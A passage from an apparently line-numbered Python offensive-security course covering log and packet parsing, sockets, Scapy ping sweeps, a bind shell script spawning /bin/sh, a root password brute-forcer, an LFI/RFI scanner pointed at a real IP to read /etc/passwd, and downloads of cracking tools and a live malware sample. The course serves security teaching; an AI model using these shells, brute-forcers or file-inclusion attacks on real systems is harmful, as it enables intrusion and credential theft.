1014 | xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file) | |
1015 | xml_file = re.sub('<local>', '<local></local>', xml_file) | |
1016 | xml_file = re.sub('&', '&', xml_file) | |
1017 | f = open(file_name+'.xml', 'w') | |
1018 | f.write(xml_file) | |
1019 | f.close() | |
1020 | try: | |
1021 | xmldoc = minidom.parse(file_name+'.xml') | |
1022 | except: | |
1023 | sys.exit('Invalid file...') | |
1024 | grandNode = xmldoc.firstChild | |
1025 | nodes = grandNode.getElementsByTagName('Event') | |
1026 | ||
1027 | event = int(raw_input('Enter Event ID : ')) | |
1028 | event_id = 0 | |
1029 | event_count = 0; | |
1030 | for node in nodes: | |
1031 | try: | |
1032 | event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue | |
1033 | if int(event_id) == event: | |
1034 | event_count += 1 | |
1035 | except: | |
1036 | continue | |
1037 | print '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count) | |
1038 | sys.exit('...Search Complete...') | |
1039 | ||
1040 | ||
1041 | ||
1042 | -------------TASK 4------------ | |
1043 | vi readevtx4.py | |
1044 | ||
1045 | import mmap | |
1046 | import re | |
1047 | import contextlib | |
1048 | import sys | |
1049 | import operator | |
1050 | import HTMLParser | |
1051 | from xml.dom import minidom | |
1052 | from operator import itemgetter, attrgetter | |
1053 | ||
1054 | from Evtx.Evtx import FileHeader | |
1055 | from Evtx.Views import evtx_file_xml_view | |
1056 | ||
1057 | pars = HTMLParser.HTMLParser() | |
1058 | print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>') | |
1059 | file_name = str(raw_input('Enter EVTX file name without extension : ')) | |
1060 | file_name = 'WIN-M751BADISCT_System' | |
1061 | with open(file_name+'.evtx', 'r') as f: | |
1062 | with contextlib.closing(mmap.mmap(f.fileno(), 0, | |
1063 | access=mmap.ACCESS_READ)) as buf: | |
1064 | fh = FileHeader(buf, 0x0) | |
1065 | xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" | |
1066 | try: | |
1067 | for xml, record in evtx_file_xml_view(fh): | |
1068 | xml_file += xml | |
1069 | except: | |
1070 | pass | |
1071 | xml_file += "</Events>" | |
1072 | xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file) | |
1073 | xml_file = re.sub('<local>', '<local></local>', xml_file) | |
1074 | xml_file = re.sub('&', '&', xml_file) | |
1075 | f = open(file_name+'.xml', 'w') | |
1076 | f.write(xml_file) | |
1077 | f.close() | |
1078 | try: | |
1079 | xmldoc = minidom.parse(file_name+'.xml') | |
1080 | except: | |
1081 | sys.exit('Invalid file...') | |
1082 | grandNode = xmldoc.firstChild | |
1083 | nodes = grandNode.getElementsByTagName('Event') | |
1084 | ||
1085 | events = [] | |
1086 | event_id = 0 | |
1087 | count = 0 | |
1088 | for node in nodes: | |
1089 | try: | |
1090 | event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue | |
1091 | try: | |
1092 | events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue}) | |
1093 | except: | |
1094 | events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'}) | |
1095 | count += 1 | |
1096 | except: | |
1097 | continue | |
1098 | events = sorted(events, key=itemgetter('event_id')) | |
1099 | for e in events: | |
1100 | print e | |
1101 | sys.exit('...Search Complete...') | |
1102 | ||
1103 | ||
1104 | ||
1105 | ||
1106 | ||
1107 | ||
1108 | ||
1109 | ||
1110 | ||
1111 | ################################################# | |
1112 | # Lesson 18: Parsing Packets with Python's DPKT # | |
1113 | ################################################# | |
1114 | The first thing that you will need to do is install dpkt. | |
1115 | ||
1116 | sudo apt-get install -y python-dpkt | |
1117 | ||
1118 | ||
1119 | ||
1120 | ||
1121 | Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'. | |
1122 | Run tcpdump to capture a .pcap file that we will use for the next exercise | |
1123 | ||
1124 | ||
1125 | sudo tcpdump -ni eth0 -s0 -w quick.pcap | |
1126 | ||
1127 | ||
1128 | --open another command prompt-- | |
1129 | wget http://packetlife.net/media/library/12/tcpdump.pdf | |
1130 | ||
1131 | ||
1132 | Let's do something simple: | |
1133 | ||
1134 | ||
1135 | vi quickpcap.py | |
1136 | -------------------------------------------------------- | |
1137 | ||
1138 | #!/usr/bin/python | |
1139 | import dpkt; | |
1140 | ||
1141 | # Simple script to read the timestamps in a pcap file | |
1142 | # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html | |
1143 | ||
1144 | f = open("quick.pcap","rb") | |
1145 | pcap = dpkt.pcap.Reader(f) | |
1146 | ||
1147 | for ts, buf in pcap: | |
1148 | print ts; | |
1149 | ||
1150 | f.close(); | |
1151 | ||
1152 | ||
1153 | -------------------------------------------------------- | |
1154 | ||
1155 | Now let's run the script we just wrote | |
1156 | ||
1157 | ||
1158 | python quickpcap.py | |
1159 | ||
1160 | ||
1161 | ||
1162 | ||
1163 | How dpkt breaks down a packet: | |
1164 | ||
1165 | Reference: | |
1166 | http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html | |
1167 | ||
1168 | src: the MAC address of SOURCE. | |
1169 | dst: The MAC address of DESTINATION | |
1170 | type: The protocol type of contained ethernet payload. | |
1171 | ||
1172 | The allowed values are listed in the file "ethernet.py", | |
1173 | such as: | |
1174 | a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data. | |
1175 | b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data. | |
1176 | ||
1177 | ||
1178 | References: | |
1179 | http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python | |
1180 | ||
1181 | ||
1182 | ||
1183 | ||
1184 | ||
1185 | ||
1186 | Ok - now let's have a look at pcapparsing.py | |
1187 | ||
1188 | sudo tcpdump -ni eth0 -s0 -w capture-100.pcap | |
1189 | ||
1190 | ||
1191 | --open another command prompt-- | |
1192 | wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf | |
1193 | ||
1194 | ||
1195 | ||
1196 | Ok - now let's have a look at pcapparsing.py | |
1197 | -------------------------------------------------------- | |
1198 | ||
1199 | import socket | |
1200 | import dpkt | |
1201 | import sys | |
1202 | f = open('capture-100.pcap','r') | |
1203 | pcapReader = dpkt.pcap.Reader(f) | |
1204 | ||
1205 | for ts,data in pcapReader: | |
1206 | ether = dpkt.ethernet.Ethernet(data) | |
1207 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1208 | ip = ether.data | |
1209 | tcp = ip.data | |
1210 | src = socket.inet_ntoa(ip.src) | |
1211 | srcport = tcp.sport | |
1212 | dst = socket.inet_ntoa(ip.dst) | |
1213 | dstport = tcp.dport | |
1214 | print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport) | |
1215 | ||
1216 | f.close() | |
1217 | ||
1218 | -------------------------------------------------------- | |
1219 | ||
1220 | ||
1221 | ||
1222 | OK - let's run it: | |
1223 | python pcapparsing.py | |
1224 | ||
1225 | ||
1226 | ||
1227 | running this script might throw an error like this: | |
1228 | ||
1229 | Traceback (most recent call last): | |
1230 | File "pcapparsing.py", line 9, in <module> | |
1231 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1232 | ||
1233 | ||
1234 | If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something) | |
1235 | ||
1236 | ||
1237 | ||
1238 | ||
1239 | Your homework for today... | |
1240 | ||
1241 | ||
1242 | Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports. | |
1243 | ||
1244 | ||
1245 | ||
1246 | ||
1247 | ||
1248 | ||
1249 | Your challenge is to fix the Traceback error | |
1250 | ||
1251 | ||
1252 | ||
1253 | ||
1254 | #!/usr/bin/python | |
1255 | ||
1256 | import pcapy | |
1257 | import dpkt | |
1258 | import sys | |
1259 | import socket | |
1260 | import struct | |
1261 | ||
1262 | SINGLE_SHOT = False | |
1263 | ||
1264 | # list all the network devices | |
1265 | pcapy.findalldevs() | |
1266 | ||
1267 | iface = "eth0" | |
1268 | filter = "arp" | |
1269 | max_bytes = 1024 | |
1270 | promiscuous = False | |
1271 | read_timeout = 100 # in milliseconds | |
1272 | ||
1273 | pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout ) | |
1274 | pc.setfilter( filter ) | |
1275 | ||
1276 | # callback for received packets | |
1277 | def recv_pkts( hdr, data ): | |
1278 | packet = dpkt.ethernet.Ethernet( data ) | |
1279 | ||
1280 | print type( packet.data ) | |
1281 | print "ipsrc: %s, ipdst: %s" %( \ | |
1282 | socket.inet_ntoa( packet.data.spa ), \ | |
1283 | socket.inet_ntoa( packet.data.tpa ) ) | |
1284 | ||
1285 | print "macsrc: %s, macdst: %s " % ( | |
1286 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha), | |
1287 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) ) | |
1288 | ||
1289 | if SINGLE_SHOT: | |
1290 | header, data = pc.next() | |
1291 | sys.exit(0) | |
1292 | else: | |
1293 | packet_limit = -1 # infinite | |
1294 | pc.loop( packet_limit, recv_pkts ) # capture packets | |
1295 | ||
1296 | ||
1297 | ||
1298 | ||
1299 | ||
1300 | ||
1301 | ||
1302 | ||
1303 | ############################# | |
1304 | # Reference Videos To Watch # | |
1305 | ############################# | |
1306 | Here is your second set of youtube videos that I'd like for you to watch: | |
1307 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20) | |
1308 | ||
1309 | ||
1310 | ||
1311 | ||
1312 | ############################################# | |
1313 | # Lesson 19: Python Sockets & Port Scanning # | |
1314 | ############################################# | |
1315 | ||
1316 | ||
1317 | $ ncat -l -v -p 1234 | |
1318 | ||
1319 | ||
1320 | ||
1321 | ||
1322 | --open another terminal-- | |
1323 | python | |
1324 | ||
1325 | >>> import socket | |
1326 | >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1327 | >>> s.connect(('localhost', 1234)) | |
1328 | >>> s.send('Hello, world') | |
1329 | >>> data = s.recv(1024) | |
1330 | >>> s.close() | |
1331 | ||
1332 | >>> print 'Received', 'data' | |
1333 | ||
1334 | ||
1335 | ||
1336 | ||
1337 | ||
1338 | ||
1339 | ######################################## | |
1340 | # Lesson 20: TCP Client and TCP Server # | |
1341 | ######################################## | |
1342 | ||
1343 | vi tcpclient.py | |
1344 | ||
1345 | ||
1346 | ||
1347 | #!/usr/bin/python | |
1348 | # tcpclient.py | |
1349 | ||
1350 | import socket | |
1351 | ||
1352 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1353 | hostport = ("127.0.0.1", 1337) | |
1354 | s.connect(hostport) | |
1355 | s.send("Hello\n") | |
1356 | buf = s.recv(1024) | |
1357 | print "Received", buf | |
1358 | ||
1359 | ||
1360 | ||
1361 | ||
1362 | ||
1363 | ||
1364 | ||
1365 | ||
1366 | ||
1367 | vi tcpserver.py | |
1368 | ||
1369 | ||
1370 | ||
1371 | ||
1372 | ||
1373 | #!/usr/bin/python | |
1374 | # tcpserver.py | |
1375 | ||
1376 | import socket | |
1377 | ||
1378 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1379 | hostport = ("", 1337) | |
1380 | s.bind(hostport) | |
1381 | s.listen(10) | |
1382 | while 1: | |
1383 | cli,addr = s.accept() | |
1384 | print "Connection from", addr | |
1385 | buf = cli.recv(1024) | |
1386 | print "Received", buf | |
1387 | if buf == "Hello\n": | |
1388 | cli.send("Server ID 1\n") | |
1389 | cli.close() | |
1390 | ||
1391 | ||
1392 | ||
1393 | ||
1394 | ||
1395 | ||
1396 | ||
1397 | ||
1398 | python tcpserver.py | |
1399 | ||
1400 | ||
1401 | --open another terminal-- | |
1402 | python tcpclient.py | |
1403 | ||
1404 | ||
1405 | ######################################## | |
1406 | # Lesson 21: UDP Client and UDP Server # | |
1407 | ######################################## | |
1408 | ||
1409 | vi udpclient.py | |
1410 | ||
1411 | ||
1412 | ||
1413 | ||
1414 | ||
1415 | ||
1416 | #!/usr/bin/python | |
1417 | # udpclient.py | |
1418 | ||
1419 | import socket | |
1420 | ||
1421 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1422 | hostport = ("127.0.0.1", 1337) | |
1423 | s.sendto("Hello\n", hostport) | |
1424 | buf = s.recv(1024) | |
1425 | print buf | |
1426 | ||
1427 | ||
1428 | ||
1429 | ||
1430 | ||
1431 | ||
1432 | ||
1433 | ||
1434 | ||
1435 | vi udpserver.py | |
1436 | ||
1437 | ||
1438 | ||
1439 | ||
1440 | ||
1441 | ||
1442 | #!/usr/bin/python | |
1443 | # udpserver.py | |
1444 | ||
1445 | import socket | |
1446 | ||
1447 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1448 | hostport = ("127.0.0.1", 1337) | |
1449 | s.bind(hostport) | |
1450 | while 1: | |
1451 | buf, address = s.recvfrom(1024) | |
1452 | print buf | |
1453 | if buf == "Hello\n": | |
1454 | s.sendto("Server ID 1\n", address) | |
1455 | ||
1456 | ||
1457 | ||
1458 | ||
1459 | ||
1460 | ||
1461 | python udpserver.py | |
1462 | ||
1463 | ||
1464 | --open another terminal-- | |
1465 | python udpclient.py | |
1466 | ||
1467 | ||
1468 | ||
1469 | ||
1470 | ||
1471 | ||
1472 | ############################### | |
1473 | # Lesson 22: Installing Scapy # | |
1474 | ############################### | |
1475 | ||
1476 | sudo apt-get update | |
1477 | sudo apt-get install python-scapy python-pyx python-gnuplot | |
1478 | ||
1479 | ||
1480 | Reference Page For All Of The Commands We Will Be Running: | |
1481 | http://samsclass.info/124/proj11/proj17-scapy.html | |
1482 | ||
1483 | Great slides for Scapy: | |
1484 | http://www.secdev.org/conf/scapy_csw05.pdf | |
1485 | ||
1486 | ||
1487 | ||
1488 | ||
1489 | To run Scapy interactively | |
1490 | ||
1491 | sudo scapy | |
1492 | ||
1493 | ||
1494 | ||
1495 | ################################################ | |
1496 | # Lesson 23: Sending ICMPv4 Packets with scapy # | |
1497 | ################################################ | |
1498 | ||
1499 | In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
1500 | ||
1501 | i = IP() | |
1502 | ||
1503 | ||
1504 | ||
1505 | ||
1506 | This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
1507 | ||
1508 | i.display() | |
1509 | ||
1510 | ||
1511 | ||
1512 | ||
1513 | Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
1514 | ||
1515 | i.dst="10.65.75.49" | |
1516 | ||
1517 | i.display() | |
1518 | ||
1519 | ||
1520 | ||
1521 | ||
1522 | Notice that scapy automatically fills in your machine's source IP address. | |
1523 | ||
1524 | Use these commands to create an object named ic of type ICMP and display its properties: | |
1525 | ||
1526 | ||
1527 | ic = ICMP() | |
1528 | ||
1529 | ic.display() | |
1530 | ||
1531 | ||
1532 | ||
1533 | ||
1534 | ||
1535 | Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
1536 | ||
1537 | sr1(i/ic) | |
1538 | ||
1539 | ||
1540 | ||
1541 | ||
1542 | ||
1543 | This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply. | |
1544 | ||
1545 | The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
1546 | ||
1547 | Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
1548 | ||
1549 | ||
1550 | sr1(i/ic/"YOUR NAME") | |
1551 | ||
1552 | ||
1553 | You should see a reply with a Raw section containing your name. | |
1554 | ||
1555 | ||
1556 | ||
1557 | ############################################## | |
1558 | # Lesson 24: Sending a UDP Packet with Scapy # | |
1559 | ############################################## | |
1560 | ||
1561 | ||
1562 | Preparing the Target | |
1563 | $ ncat -ulvp 4444 | |
1564 | ||
1565 | ||
1566 | ||
1567 | ||
1568 | --open another terminal-- | |
1569 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
1570 | ||
1571 | u = UDP() | |
1572 | ||
1573 | u.display() | |
1574 | ||
1575 | ||
1576 | ||
1577 | This creates an object named u of type UDP, and displays its properties. | |
1578 | ||
1579 | Execute these commands to change the destination port to 4444 and display the properties again: | |
1580 | ||
1581 | i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
1582 | ||
1583 | u.dport = 4444 | |
1584 | ||
1585 | u.display() | |
1586 | ||
1587 | ||
1588 | ||
1589 | Execute this command to send the packet to the Windows machine: | |
1590 | ||
1591 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
1592 | ||
1593 | ||
1594 | ||
1595 | On the Windows target, you should see the message appear | |
1596 | ||
1597 | ||
1598 | ||
1599 | ||
1600 | ####################################### | |
1601 | # Lesson 25: Ping Sweeping with Scapy # | |
1602 | ####################################### | |
1603 | ||
1604 | ||
1605 | ||
1606 | #!/usr/bin/python | |
1607 | from scapy.all import * | |
1608 | ||
1609 | TIMEOUT = 2 | |
1610 | conf.verb = 0 | |
1611 | for ip in range(0, 256): | |
1612 | packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP() | |
1613 | reply = sr1(packet, timeout=TIMEOUT) | |
1614 | if not (reply is None): | |
1615 | print reply.dst, "is online" | |
1616 | else: | |
1617 | print "Timeout waiting for %s" % packet[IP].dst | |
1618 | ||
1619 | ||
1620 | ||
1621 | ############################################### | |
1622 | # Checking out some scapy based port scanners # | |
1623 | ############################################### | |
1624 | ||
1625 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
1626 | ||
1627 | cat rdp_scan.py | |
1628 | ||
1629 | sudo python rdp_scan.py 10.10.30.250 | |
1630 | ||
1631 | ||
1632 | ||
1633 | ###################################### | |
1634 | # Dealing with conf.verb=0 NameError # | |
1635 | ###################################### | |
1636 | ||
1637 | conf.verb = 0 | |
1638 | NameError: name 'conf' is not defined | |
1639 | ||
1640 | Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from: | |
1641 | ||
1642 | from scapy import * | |
1643 | to | |
1644 | from scapy.all import * | |
1645 | ||
1646 | ||
1647 | ||
1648 | Reference: | |
1649 | http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html | |
1650 | ||
1651 | ||
1652 | conf.verb=0 is a verbosity setting (configuration/verbosity = conv | |
1653 | ||
1654 | ||
1655 | ||
1656 | Here are some good Scapy references: | |
1657 | http://www.secdev.org/projects/scapy/doc/index.html | |
1658 | http://resources.infosecinstitute.com/port-scanning-using-scapy/ | |
1659 | http://www.hackerzvoice.net/ouah/blackmagic.txt | |
1660 | http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html | |
1661 | ||
1662 | ||
1663 | ###################################### | |
1664 | # Lesson 26: Bind and Reverse Shells # | |
1665 | ###################################### | |
1666 | vi simplebindshell.py | |
1667 | ||
1668 | ||
1669 | #!/bin/python | |
1670 | import os,sys,socket | |
1671 | ||
1672 | ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
1673 | print '-Creating socket..' | |
1674 | port = 31337 | |
1675 | try: | |
1676 | ls.bind(('', port)) | |
1677 | print '-Binding the port on ' | |
1678 | ls.listen(1) | |
1679 | print '-Listening, ' | |
1680 | (conn, addr) = ls.accept() | |
1681 | print '-Waiting for connection...' | |
1682 | cli= conn.fileno() | |
1683 | print '-Redirecting shell...' | |
1684 | os.dup2(cli, 0) | |
1685 | print 'In, ' | |
1686 | os.dup2(cli, 1) | |
1687 | print 'Out, ' | |
1688 | os.dup2(cli, 2) | |
1689 | print 'Err' | |
1690 | print 'Done!' | |
1691 | arg0='/bin/sh' | |
1692 | arg1='-a' | |
1693 | args=[arg0]+[arg1] | |
1694 | os.execv(arg0, args) | |
1695 | except(socket.error): | |
1696 | print 'fail\n' | |
1697 | conn.close() | |
1698 | sys.exit(1) | |
1699 | ||
1700 | ||
1701 | ||
1702 | ||
1703 | ||
1704 | ||
1705 | ||
1706 | nc TARGETIP 31337 | |
1707 | ||
1708 | ||
1709 | ||
1710 | --------------------- | |
1711 | Preparing the target for a reverse shell | |
1712 | $ ncat -lvp 4444 | |
1713 | ||
1714 | ||
1715 | ||
1716 | --open another terminal-- | |
1717 | wget https://www.trustedsec.com/files/simple_py_shell.py | |
1718 | ||
1719 | vi simple_py_shell.py | |
1720 | ||
1721 | ||
1722 | ||
1723 | ||
1724 | ||
1725 | ||
1726 | ------------------------------- | |
1727 | Tricky shells | |
1728 | ||
1729 | Reference: | |
1730 | http://securityweekly.com/2011/10/python-one-line-shell-code.html | |
1731 | http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/ | |
1732 | ||
1733 | ||
1734 | ||
1735 | ||
1736 | ||
1737 | ||
1738 | ############################# | |
1739 | # Reference Videos To Watch # | |
1740 | ############################# | |
1741 | Here is your third set of youtube videos that I'd like for you to watch: | |
1742 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30) | |
1743 | ||
1744 | ||
1745 | ||
1746 | ||
1747 | ################################################# | |
1748 | # Lesson 27: Python Functions & String Handling # | |
1749 | ################################################# | |
1750 | ||
1751 | Python can make use of functions: | |
1752 | http://www.tutorialspoint.com/python/python_functions.htm | |
1753 | ||
1754 | ||
1755 | ||
1756 | Python can interact with the 'crypt' function used to create Unix passwords: | |
1757 | http://docs.python.org/2/library/crypt.html | |
1758 | ||
1759 | ||
1760 | ||
1761 | Tonight we will see a lot of the split() method so be sure to keep the following references close by: | |
1762 | http://www.tutorialspoint.com/python/string_split.htm | |
1763 | ||
1764 | ||
1765 | Tonight we will see a lot of slicing so be sure to keep the following references close by: | |
1766 | http://techearth.net/python/index.php5?title=Python:Basics:Slices | |
1767 | ||
1768 | ||
1769 | ||
1770 | ||
1771 | ||
1772 | ################################ | |
1773 | # Lesson 28: Password Cracking # | |
1774 | ################################ | |
1775 | ||
1776 | wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py | |
1777 | ||
1778 | vi htcrack.py | |
1779 | ||
1780 | vi list.txt | |
1781 | ||
1782 | hello | |
1783 | goodbye | |
1784 | red | |
1785 | blue | |
1786 | yourname | |
1787 | tim | |
1788 | bob | |
1789 | ||
1790 | ||
1791 | htpasswd -nd yourname | |
1792 | - enter yourname as the password | |
1793 | ||
1794 | ||
1795 | ||
1796 | python htcrack.py joe:7XsJIbCFzqg/o list.txt | |
1797 | ||
1798 | ||
1799 | ||
1800 | ||
1801 | sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc | |
1802 | ||
1803 | rm -rf mechanize-0.2.5.tar.gz | |
1804 | ||
1805 | sudo /bin/bash | |
1806 | ||
1807 | passwd | |
1808 | ***set root password*** | |
1809 | ||
1810 | ||
1811 | ||
1812 | ||
1813 | vi rootbrute.py | |
1814 | ||
1815 | ||
1816 | #!/usr/bin/env python | |
1817 | ||
1818 | import sys | |
1819 | try: | |
1820 | import pexpect | |
1821 | except(ImportError): | |
1822 | print "\nYou need the pexpect module." | |
1823 | print "http://www.noah.org/wiki/Pexpect\n" | |
1824 | sys.exit(1) | |
1825 | ||
1826 | #Change this if needed. | |
1827 | # LOGIN_ERROR = 'su: incorrect password' | |
1828 | LOGIN_ERROR = "su: Authentication failure" | |
1829 | ||
1830 | def brute(word): | |
1831 | print "Trying:",word | |
1832 | child = pexpect.spawn('/bin/su') | |
1833 | child.expect('Password: ') | |
1834 | child.sendline(word) | |
1835 | i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3) | |
1836 | if i == 1: | |
1837 | print "Incorrect Password" | |
1838 | ||
1839 | if i == 2: | |
1840 | print "\n\t[!] Root Password:" ,word | |
1841 | child.sendline ('id') | |
1842 | print child.before | |
1843 | child.interact() | |
1844 | ||
1845 | if len(sys.argv) != 2: | |
1846 | print "\nUsage : ./rootbrute.py <wordlist>" | |
1847 | print "Eg: ./rootbrute.py words.txt\n" | |
1848 | sys.exit(1) | |
1849 | ||
1850 | try: | |
1851 | words = open(sys.argv[1], "r").readlines() | |
1852 | except(IOError): | |
1853 | print "\nError: Check your wordlist path\n" | |
1854 | sys.exit(1) | |
1855 | ||
1856 | print "\n[+] Loaded:",len(words),"words" | |
1857 | print "[+] BruteForcing...\n" | |
1858 | for word in words: | |
1859 | brute(word.replace("\n","")) | |
1860 | ||
1861 | ||
1862 | ||
1863 | ||
1864 | References you might find helpful: | |
1865 | http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python | |
1866 | ||
1867 | ||
1868 | ||
1869 | ||
1870 | ||
1871 | ||
1872 | ||
1873 | ||
1874 | ||
1875 | wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py | |
1876 | ||
1877 | vi md5crack.py | |
1878 | ||
1879 | ||
1880 | ||
1881 | ||
1882 | ||
1883 | ||
1884 | Why use hexdigest | |
1885 | http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string | |
1886 | ||
1887 | ||
1888 | ||
1889 | ||
1890 | http://md5online.net/ | |
1891 | ||
1892 | ||
1893 | ||
1894 | ||
1895 | ||
1896 | ||
1897 | ||
1898 | wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py | |
1899 | ||
1900 | ||
1901 | ||
1902 | ||
1903 | ############################# | |
1904 | # Reference Videos To Watch # | |
1905 | ############################# | |
1906 | Here is your forth set of youtube videos that I'd like for you to watch: | |
1907 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40) | |
1908 | ||
1909 | ||
1910 | ||
1911 | ||
1912 | ||
1913 | ###################### | |
1914 | # Lesson 29: Web App # | |
1915 | ###################### | |
1916 | vi wpbruteforcer.py | |
1917 | ||
1918 | ||
1919 | python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt | |
1920 | ||
1921 | ||
1922 | ||
1923 | - Here is an example of an LFI | |
1924 | - Open this page in Firefox: | |
1925 | http://54.186.248.116/showfile.php?filename=contactus.txt | |
1926 | ||
1927 | - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt) | |
1928 | - Here you see a direct reference to a file on the local filesystem of the victim machine. | |
1929 | - You can attack this by doing the following: | |
1930 | http://54.186.248.116/showfile.php?filename=/etc/passwd | |
1931 | ||
1932 | - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from | |
1933 | - somewhere else on the Internet. Here is an example of a text file on the web: | |
1934 | http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
1935 | ||
1936 | - Now we can attack the target via RFI like this: | |
1937 | http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
1938 | ||
1939 | ||
1940 | - Now let's see if we can write some code to do this for us: | |
1941 | ||
1942 | vi LFI-RFI.py | |
1943 | ||
1944 | ||
1945 | ||
1946 | #!/usr/bin/env python | |
1947 | print "\n### PHP LFI/RFI Detector ###" | |
1948 | print "### Sean Arries 09/18/09 ###\n" | |
1949 | ||
1950 | import urllib2,re,sys | |
1951 | ||
1952 | ||
1953 | TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt" | |
1954 | RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?" | |
1955 | TravLimit = 12 | |
1956 | ||
1957 | print "==> Testing for LFI vulns.." | |
1958 | TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION | |
1959 | for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP | |
1960 | TARGET += "../" | |
1961 | try: | |
1962 | source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST | |
1963 | except urllib2.URLError, e: | |
1964 | print "$$$ We had an Error:",e | |
1965 | sys.exit(0) | |
1966 | if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE | |
1967 | print "!! ==> LFI Found:",TARGET+"etc/passwd" | |
1968 | break ## BREAK LOOP WHEN VULN FOUND | |
1969 | ||
1970 | print "\n==> Testing for RFI vulns.." | |
1971 | TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION | |
1972 | try: | |
1973 | source = urllib2.urlopen(TARGET).read() ## WEB REQUEST | |
1974 | except urllib2.URLError, e: | |
1975 | print "$$$ We had an Error:",e | |
1976 | sys.exit(0) | |
1977 | if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE | |
1978 | print "!! => RFI Found:",TARGET | |
1979 | ||
1980 | ||
1981 | print "\nScan Complete\n" ## DONE | |
1982 | ||
1983 | ||
1984 | ||
1985 | ||
1986 | ############################### | |
1987 | # Lesson 30: Malware Analysis # | |
1988 | ############################### | |
1989 | This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': | |
1990 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
1991 | wget http://www.beenuarora.com/code/analyse_malware.py | |
1992 | ||
1993 | unzip malware-password-is-infected.zip | |
1994 | infected | |
1995 | ||
1996 | file malware.exe | |
1997 | ||
1998 | mv malware.exe malware.pdf | |
1999 | ||
2000 | file malware.pdf | |
2001 | ||
2002 | mv malware.pdf malware.exe | |
2003 | ||
2004 | hexdump -n 2 -C malware.exe | |
2005 | ||
2006 | ***What is '4d 5a' or 'MZ'*** | |
